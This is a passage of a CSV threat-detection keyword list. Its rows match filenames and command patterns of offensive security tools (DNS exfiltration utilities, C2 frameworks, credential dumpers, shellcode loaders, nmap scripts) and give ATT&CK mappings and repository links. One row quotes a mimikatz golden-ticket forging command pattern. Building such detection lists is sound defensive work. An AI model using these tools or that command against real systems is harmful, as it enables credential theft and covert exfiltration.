can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*/DNSExfiltrator*",".{0,1000}\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*/dns-fuzz.nse*",".{0,1000}\/dns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-ip6-arpa-scan.nse*",".{0,1000}\/dns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsec3-enum.nse*",".{0,1000}\/dns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsec-enum.nse*",".{0,1000}\/dns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsid.nse*",".{0,1000}\/dns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DNS-Persist/*",".{0,1000}\/DNS\-Persist\/.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*/dns-random-srcport.nse*",".{0,1000}\/dns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-random-txid.nse*",".{0,1000}\/dns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsrecon.py*",".{0,1000}\/dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dnsrecon-subdomain-bruteforce.py*",".{0,1000}\/dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dns-recursion.nse*",".{0,1000}\/dns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-service-discovery.nse*",".{0,1000}\/dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsspoof.c*",".{0,1000}\/dnsspoof\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dns-srv-enum.nse*",".{0,1000}\/dns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DNSStager.git*",".{0,1000}\/DNSStager\.git.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*/dnsstager.py*",".{0,1000}\/dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*/dnsteal*",".{0,1000}\/dnsteal.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*/dnstool.py*",".{0,1000}\/dnstool\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/dns-update.nse*",".{0,1000}\/dns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap 
NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zeustracker.nse*",".{0,1000}\/dns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.nse*",".{0,1000}\/dns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.py*",".{0,1000}\/dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dobin/avred*",".{0,1000}\/dobin\/avred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/docker-version.nse*",".{0,1000}\/docker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DocPlz.git*",".{0,1000}\/DocPlz\.git.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/DocsPLZ.cpp*",".{0,1000}\/DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/DocsPLZ.exe*",".{0,1000}\/DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/documentation-c2/*",".{0,1000}\/documentation\-c2\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/documentation-payload/*",".{0,1000}\/documentation\-payload\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Doge-Loader/*",".{0,1000}\/Doge\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/DoHC2.cs*",".{0,1000}\/DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2.git*",".{0,1000}\/DoHC2\.git.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2/*",".{0,1000}\/DoHC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*",".{0,1000}\/domain\:.{0,1000}\s\/sid\:.{0,1000}\s\/sids\:.{0,1000}\s\/rc4\:.{0,1000}\s\/user\:.{0,1000}\s\/service\:krbtgt\s\/target\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/domain_analyzer.git*",".{0,1000}\/domain_analyzer\.git.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domain_analyzer:latest*",".{0,1000}\/domain_analyzer\:latest.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - 
T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domainhunter*",".{0,1000}\/domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*/DomainPasswordSpray.git*",".{0,1000}\/DomainPasswordSpray\.git.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*/DomainRecon/*.txt*",".{0,1000}\/DomainRecon\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/domcon-brute.nse*",".{0,1000}\/domcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/domcon-cmd.nse*",".{0,1000}\/domcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Dome.git*",".{0,1000}\/Dome\.git.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*/domino-enum-users.nse*",".{0,1000}\/domino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dompdf-rce*",".{0,1000}\/dompdf\-rce.{0,1000}","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","175","66","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z" "*/DonPAPI.git*",".{0,1000}\/DonPAPI\.git.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/DonPAPI.py*",".{0,1000}\/DonPAPI\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/DonPAPI.zip*",".{0,1000}\/DonPAPI\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/donut *.exe*",".{0,1000}\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/donut.exe*",".{0,1000}\/donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/donut.git",".{0,1000}\/donut\.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/Donut_Linux*",".{0,1000}\/Donut_Linux.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*/Donut_Windows*",".{0,1000}\/Donut_Windows.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*/DonutCS/Donut.cs*",".{0,1000}\/DonutCS\/Donut\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/donutmodule.c*",".{0,1000}\/donutmodule\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/DonutTest/*",".{0,1000}\/DonutTest\/.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/DotNet/SigFlip*",".{0,1000}\/DotNet\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
